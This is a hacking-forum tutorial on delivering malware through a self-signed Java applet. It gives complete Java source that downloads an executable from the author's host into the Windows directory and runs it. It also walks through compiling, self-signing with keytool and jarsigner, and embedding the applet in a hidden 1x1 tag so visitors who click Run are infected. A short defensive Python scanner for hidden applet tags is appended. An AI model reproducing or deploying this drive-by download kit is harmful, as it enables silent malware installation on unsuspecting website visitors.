1) I did not write the java code being used (I just took out a lot of unnecessary crap and added some lines)
2) It’s not the same code used on milw0rm.
3) I did not discover this.
Requirements:
1) Hosting (better if it’s your own, but can use any which allows the upload of exe’s)
2) Java SDK. Most will probably have this; if not, you can download it here:
http://java.sun.com/javase/6/download.jsp
3) Your malware (or anything else you want it to auto download and execute)
Let’s get started!
Java applets are allowed to access your system provided they are signed with a certificate, which costs about $700! But don’t worry, you can actually sign Java applets yourself. Because these applets are self-signed, a warning like this is shown before they load:
We see these all the time, and for the most part people will just click Run anyway. As soon as the visitor clicks Run, the malware will download and execute on their system. Now let’s go through the fields you can see on the cert.
Name:
The name is taken from the class name of the Java file you used for your applet. So whatever name you want to appear on the unsigned cert notice, give that name to the Java class.
Publisher:
You can enter this when you’re signing your applets. The publisher will be what you enter for ‘Name’ (you’ll understand what I mean later!)
From:
This will just be the website where the java applets are stored!
Please note: 120*am.co.uk is a website I setup with poison ivy, don’t go there.
Now we understand the cert, let’s take a look at the java code. I won’t explain all of it; I’ll just explain the parts you’ll need to edit for your own use.
Ok, if you look at the Java code provided (at the end of the tutorial, in code tags!), these are the parts you need to change.
String fileoot = System.getenv("WINDIR");
String fname = "\\sch.exe";
String efool = fileoot.concat(fname);
The first line simply gets the environment variable WINDIR, which will return C:\Windows
The second line will be what you want your malware to be called when stored on their computer. In this case it’s sch.exe
The third line puts it all together and stores it in the variable efool. So in this example it’ll look like this:
C:\Windows\sch.exe
This is obviously what our malware will be when stored on the user’s computer!
The next part to change is:
URL url = new URL("http://www.1201am.co.uk/sch.exe");
Just change the 120*am.co.uk/sch.exe to the path of where your malware is stored on your website!
Also you can change this part:
public class Client extends Applet
As we mentioned earlier the name field on the cert pop-up will be the class name, so where it says ‘Client’ change this to what you want.
You’ll also need to change the class’s constructor to the same name you changed ‘Client’ to above. It looks like this:
public Client()
{
}
So just change where it says Client to whatever you renamed the class.
That’s all we really need to change.
Once you’ve made those amendments save the file as:
Client.java
If you renamed the class like mentioned earlier you’ll need to name the java file the same.
Now the next things we have to do are: Compile the java code to a class, Compile it to a .jar, sign the .jar with our self-made cert, Put them in an html document as applets, and upload to site!
Now to make things easier, Move the Client.java file to the java sdk bin folder, which by default will be:
C:\Program Files\jdk1.6.0\bin
This is where all the tools we need are
Now open up command prompt, and change the path to C:\Program Files\jdk1.6.0\bin
Simply by typing in:
cd C:\Program Files\jdk1.6.0\bin
So it’ll look something like this:
Paint disfigured the screenshot, sorry about that, but it’s clear enough to see.
Now the next thing we need to do is compile the .java file into a class file.
Just type in:
javac Client.java
(There’s a space between javac and Client.java)
Now a class file will appear in the same directory as the java file (yey).
Now we need to package that class file into a .jar file!
Type in:
jar cf Client.jar Client.class
Client.jar will be the name of your newly compiled .jar file, and Client.class is the class we made earlier.
Now in your directory you should have Client.java, Client.class and Client.jar.
All we have left to do now is create our cert, assign it to our .jar file, then put them in a page as applets and upload to the website.
Ok, now in cmd we’re going to be using keytool to create our keyfile and cert.
To create our keyfile simply do this:
keytool -genkey -keystore MyFileName -alias me
Now where it says MyFileName, change this to what you like.
Remember the password you enter, You will need it later!
It’ll ask you other stuff like name, organization etc…
Just make it up. Then it’ll ask if it’s correct, just type yes and press enter. Then it’ll ask you to enter a pass for <me>, just press enter again.
Now we need to use the keytool again to self cert.
Here’s how:
keytool -selfcert -keystore MyFileName -alias me
Again, where it says MyFileName, type the same name you used earlier!
Then it’ll ask you to enter a password. This is the password you used earlier. That’s why I asked you to remember it.
Once you entered your pass, Just press enter.
Ok now we have to sign the .jar with the cert we’ve created!
To do this simply do this:
jarsigner -keystore myFileName Client.jar me
Now where it says myFileName use the file name you used earlier for the keyfile, and where it says Client.jar just put in what your jar file is called!
It’ll ask for the password again, Enter it and it should say:
The signer certificates will expire after six months.
Congratulations, you’ve compiled and signed your Java code. Now we need to put them in the form of Java applets and upload them to the website.
Here’s how:
<applet width='1' height='1' code='Client.class' archive='Client.jar'> </applet>
Where it says Client.class just put your class you made earlier, and where it says Client.jar that’s the jar file we made and signed earlier.
Save that as an html file. Upload the html file, class file, .jar file and your malware to your host and my friend, you are done.
Hopefully you’ve learnt something new and could come in handy at some stage!
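From the defender's side, the 1x1 applet tag shown above is itself a detection signal. The following Python sketch is an added example, not part of the original tutorial: it scans page source for applet tags whose width or height makes them effectively invisible. The 2-pixel threshold, the function names and the two sample pages are assumptions made for illustration.

```python
from html.parser import HTMLParser
import re

MAX_VISIBLE_PX = 2  # assumption: an applet this small is effectively hidden


def _pixels(value):
    """Return the leading integer of a width/height attribute, or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class AppletFinder(HTMLParser):
    """Collects every <applet> tag and marks the ones sized to be invisible."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        hidden = any(d is not None and d <= MAX_VISIBLE_PX for d in (w, h))
        self.findings.append({
            "line": self.getpos()[0],
            "code": a.get("code", ""),
            "archive": a.get("archive", ""),
            "hidden": hidden,
        })


def find_applets(html):
    """Parse page source and return one finding dict per <applet> tag."""
    finder = AppletFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample pages (not captured traffic).
SUSPICIOUS = "<html><body>\n<applet width='1' height='1' code='Client.class' archive='Client.jar'> </applet>\n</body></html>"
BENIGN = '<html><body>\n<applet width="400" height="300" code="Chart.class"></applet>\n</body></html>'

if __name__ == "__main__":
    for name, page in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        for finding in find_applets(page):
            print(name, finding)
```

A hit with "hidden" set is a lead for triage rather than a verdict; the referenced archive and its signer still need to be examined.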
import java.applet.Applet;
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
import java.awt.*;
import java.net.*;
public class Client extends Applet
{
public Client()
{
}
public void start()
{
try
{
String fileoot = System.getenv("WINDIR");
String fname = "\\sch.exe";
String efool = fileoot.concat(fname);
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.1201am.co.uk/sch.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream(efool));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) {
}
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec(efool);
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
}
catch(Exception exception1) {
}
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception1) {
}
}
catch(Exception e) { }
}
public void main(String args[])
{
start();
}
public void stop()
{
}
}
src: ELITEXBYTES